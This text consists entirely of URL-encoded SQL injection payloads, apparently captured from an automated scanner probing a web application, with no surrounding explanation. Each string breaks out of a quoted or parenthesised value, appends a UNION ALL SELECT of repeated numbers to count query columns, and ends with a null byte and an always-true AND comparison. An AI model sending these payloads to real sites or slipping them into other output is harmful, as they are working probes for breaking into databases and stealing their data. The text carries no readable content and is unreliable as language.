-1623%27%20UNION%20ALL%20SELECT%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%2C%202239%00%20AND%20%27bide%27%20LIKE%20%27bide -6577%27%20UNION%20ALL%20SELECT%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%00%20AND%20%27ckWK%27%20LIKE%20%27ckWK -8202%27%20UNION%20ALL%20SELECT%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%00%20AND%20%27arRd%27%20LIKE%20%27arRd -3359%27%20UNION%20ALL%20SELECT%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%2C%202992%00%20AND%20%27Lakf%27%20LIKE%20%27Lakf -8283%22%29%20UNION%20ALL%20SELECT%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%00%20AND%20%28%22gnNd%22%3D%22gnNd -3770%22%29%20UNION%20ALL%20SELECT%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%2C%209517%00%20AND%20%28%22tJgb%22%3D%22tJgb -1391%22%29%20UNION%20ALL%20SELECT%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%00%20AND%20%28%22UAwp%22%3D%22UAwp -4510%22%29%20UNION%20ALL%20SELECT%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%2C%201905%00%20AND%20%28%22lUyx%22%3D%22lUyx -2135%22%29%20UNION%20ALL%20SELECT%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%00%20AND%20%28%22sWQa%22%3D%22sWQa -2135%22%29%20UNION%20ALL%20SELECT%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%00%20AND%20%28%22ylzf%22%3D%22ylzf -4045%22%29%20UNION%20ALL%20SELECT%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%00%20AND%20%28%22Csie%22%3D%22Csie -8676%22%29%20UNION%20ALL%20SELECT%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%2C%203513%00%20AND%20%28%22Plkk%22%3D%22Plkk -7596%22%29%20UNION%20ALL%20SELECT%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%2C%201442%00%20AND%20%28%22evpD%22%3D%22evpD -2808%22%29%20UNION%20ALL%20SELECT%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%2C%201328%00%20AND%20%28%22Thdj%22%3D%22Thdj -5839%22%29%29%20UNION%20ALL%20SELECT%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%2C%208722%00%20AND%20%28%28%22GgOH%22%3D%22GgOH -6948%22%29%29%20UNION%20ALL%20SELECT%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%2C%202594%00%20AND%20%28%28%22InxI%22%3D%22InxI -5514%22%29%29%20UNION%20ALL%20SELECT%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%00%20AND%20%28%28%22HlQh%22%3D%22HlQh -2374%22%29%29%20UNION%20ALL%20SELECT%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%2C%203146%00%20AND%20%28%28%22PcpL%22%3D%22PcpL -2850%22%29%29%20UNION%20ALL%20SELECT%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%00%20AND%20%28%28%22Nazi%22%3D%22Nazi -1874%22%29%29%20UNION%20ALL%20SELECT%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%2C%208184%00%20AND%20%28%28%22MHLx%22%3D%22MHLx -3783%22%29%29%20UNION%20ALL%20SELECT%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%00%20AND%20%28%28%22MrrQ%22%3D%22MrrQ -5852%22%29%29%20UNION%20ALL%20SELECT%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%2C%204994%00%20AND%20%28%28%22rDml%22%3D%22rDml -3882%22%29%29%20UNION%20ALL%20SELECT%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%00%20AND%20%28%28%22cONx%22%3D%22cONx -1693%22%29%29%20UNION%20ALL%20SELECT%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%2C%201264%00%20AND%20%28%28%22YADB%22%3D%22YADB -4128%22%29%29%29%20UNION%20ALL%20SELECT%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%2C%205628%00%20AND%20%28%28%28%22Xscz%22%3D%22Xscz -7965%22%29%29%29%20UNION%20ALL%20SELECT%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%00%20AND%20%28%28%28%22wAtq%22%3D%22wAtq -5190%22%29%29%29%20UNION%20ALL%20SELECT%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%2C%207659%00%20AND%20%28%28%28%22oeqn%22%3D%22oeqn -5163%22%29%29%29%20UNION%20ALL%20SELECT%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%00%20AND%20%28%28%28%22oXWZ%22%3D%22oXWZ -9406%22%29%29%29%20UNION%20ALL%20SELECT%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%2C%207082%00%20AND%20%28%28%28%22nBKA%22%3D%22nBKA -5123%22%29%29%29%20UNION%20ALL%20SELECT%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%00%20AND%20%28%28%28%22Icnm%22%3D%22Icnm -5821%22%29%29%29%20UNION%20ALL%20SELECT%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%2C%207232%00%20AND%20%28%28%28%22bZQm%22%3D%22bZQm -9180%22%29%29%29%20UNION%20ALL%20SELECT%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%00%20AND%20%28%28%28%22FGqc%22%3D%22FGqc -5538%22%29%29%29%20UNION%20ALL%20SELECT%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%00%20AND%20%28%28%28%22jmCA%22%3D%22jmCA -6572%22%29%29%29%20UNION%20ALL%20SELECT%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%00%20AND%20%28%28%28%22alXk%22%3D%22alXk -7084%22%20UNION%20ALL%20SELECT%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%2C%202492%00%20AND%20%22BRjC%22%3D%22BRjC -4914%22%20UNION%20ALL%20SELECT%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%2C%209462%00%20AND%20%22vJOl%22%3D%22vJOl -8910%22%20UNION%20ALL%20SELECT%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%2C%209409%00%20AND%20%22mkIt%22%3D%22mkIt -1652%22%20UNION%20ALL%20SELECT%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%2C%205865%00%20AND%20%22pTEP%22%3D%22pTEP -9503%22%20UNION%20ALL%20SELECT%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%2C%205771%00%20AND%20%22fnva%22%3D%22fnva -2924%22%20UNION%20ALL%20SELECT%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%00%20AND%20%22ONCi%22%3D%22ONCi -9849%22%20UNION%20ALL%20SELECT%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%00%20AND%20%22WYfv%22%3D%22WYfv -2429%22%20UNION%20ALL%20SELECT%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%00%20AND%20%22VLBp%22%3D%22VLBp -7597%22%20UNION%20ALL%20SELECT%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%00%20AND%20%22takD%22%3D%22takD -1422%22%20UNION%20ALL%20SELECT%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%2C%205250%00%20AND%20%22fNXI%22%3D%22fNXI -7776%22%29%20UNION%20ALL%20SELECT%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%2C%207601%00%20AND%20%28%22bJpi%22%20LIKE%20%22bJpi -7010%22%29%20UNION%20ALL%20SELECT%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%2C%207900%00%20AND%20%28%22YsoE%22%20LIKE%20%22YsoE 